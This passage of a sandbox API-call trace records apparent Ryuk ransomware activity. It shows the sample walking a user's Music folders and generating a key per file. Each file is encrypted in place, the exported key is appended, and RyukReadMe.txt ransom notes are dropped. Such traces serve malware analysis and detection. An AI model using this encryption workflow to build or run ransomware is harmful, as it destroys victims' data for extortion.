lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x129c0, lpOverlapped=0x0) returned 1 [0156.863] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.863] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.863] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.863] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.863] CloseHandle (hObject=0x18c) returned 1 [0156.879] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.883] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.883] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.883] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.883] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.883] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GKd5-xI6Zfm9CUWabUmw\\WgaAA4pmCkP5de.wav", dwFileAttributes=0x80) returned 1 [0156.884] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GKd5-xI6Zfm9CUWabUmw\\WgaAA4pmCkP5de.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gkd5-xi6zfm9cuwabumw\\wgaaa4pmckp5de.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.884] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=11208) returned 1 [0156.884] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=11208) returned 1 [0156.884] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x2aa6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.884] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0156.885] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.885] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.885] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.885] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.885] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2bc8, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x2bc8, lpOverlapped=0x0) returned 1 [0156.885] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.885] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x2bc8, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x2bd0) returned 1 [0156.885] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.885] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2bd0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x2bd0, lpOverlapped=0x0) returned 1 [0156.886] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.886] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.886] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.886] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.886] CloseHandle (hObject=0x18c) returned 1 [0156.902] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.906] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.906] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.906] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.906] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.906] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GKd5-xI6Zfm9CUWabUmw\\zGZ8tuh9.m4a", dwFileAttributes=0x80) returned 1 [0156.907] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GKd5-xI6Zfm9CUWabUmw\\zGZ8tuh9.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gkd5-xi6zfm9cuwabumw\\zgz8tuh9.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.907] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=98613) returned 1 [0156.907] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=98613) returned 1 [0156.907] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x18013, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.907] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0156.908] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.908] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.908] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.908] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.908] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18135, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x18135, lpOverlapped=0x0) returned 1 [0156.909] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.909] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x18135, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x18140) returned 1 [0156.910] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.910] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18140, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x18140, lpOverlapped=0x0) returned 1 [0156.910] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.911] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.911] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.911] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.911] CloseHandle (hObject=0x18c) returned 1 [0156.959] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.963] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.963] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.963] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0156.963] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0156.964] SetLastError (dwErrCode=0x0) [0156.964] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GKd5-xI6Zfm9CUWabUmw\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gkd5-xi6zfm9cuwabumw\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0156.964] GetLastError () returned 0x0 [0156.964] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0156.965] CloseHandle (hObject=0x188) returned 1 [0156.965] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.965] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.965] SetLastError (dwErrCode=0x0) [0156.965] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0156.965] GetLastError () returned 0xb7 [0156.965] CloseHandle (hObject=0x188) returned 1 [0156.965] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0156.965] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.965] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.965] SetLastError (dwErrCode=0x0) [0156.965] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.966] GetLastError () returned 0x0 [0156.966] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0156.966] CloseHandle (hObject=0x18c) returned 1 [0156.966] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0156.966] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0156.967] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0156.967] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.967] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\eN2-pDWMNCGeRC5s.mp3", dwFileAttributes=0x80) returned 1 [0156.967] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\eN2-pDWMNCGeRC5s.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\en2-pdwmncgerc5s.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0156.967] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=4993) returned 1 [0156.967] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=4993) returned 1 [0156.967] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x125f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.967] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0156.968] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.968] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0156.968] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.968] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.968] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1381, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x1381, lpOverlapped=0x0) returned 1 [0156.968] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0156.968] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x1381, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x1390) returned 1 [0156.968] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.969] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x1390, lpOverlapped=0x0) returned 1 [0156.969] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0156.969] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0156.969] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0156.969] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0156.969] CloseHandle (hObject=0x190) returned 1 [0156.999] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.005] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.005] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.005] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0157.005] SetLastError (dwErrCode=0x0) [0157.005] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0157.005] GetLastError () returned 0x0 [0157.005] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0157.006] CloseHandle (hObject=0x190) returned 1 [0157.007] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\R6eW1GlkI83p\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0157.007] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.007] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.007] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0157.007] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\R6eW1GlkI83p\\A0i1MgvX0_ pEZAoQF.wav", dwFileAttributes=0x80) returned 1 [0157.007] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\R6eW1GlkI83p\\A0i1MgvX0_ pEZAoQF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\r6ew1glki83p\\a0i1mgvx0_ pezaoqf.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0157.008] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=51106) returned 1 [0157.008] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=51106) returned 1 [0157.008] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xc680, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.008] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0157.008] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.008] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0157.009] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.009] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.009] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0xc7a2, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xc7a2, lpOverlapped=0x0) returned 1 [0157.010] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0157.010] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xc7a2, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xc7b0) returned 1 [0157.010] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.010] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc7b0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0xc7b0, lpOverlapped=0x0) returned 1 [0157.011] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0157.011] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.011] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.011] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0157.011] CloseHandle (hObject=0x194) returned 1 [0157.030] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.042] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.042] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.043] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.043] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0157.043] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\R6eW1GlkI83p\\jql8EQk4.wav", dwFileAttributes=0x80) returned 1 [0157.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\R6eW1GlkI83p\\jql8EQk4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\r6ew1glki83p\\jql8eqk4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0157.043] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=56413) returned 1 [0157.043] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=56413) returned 1 [0157.043] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xdb3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.044] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0157.044] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 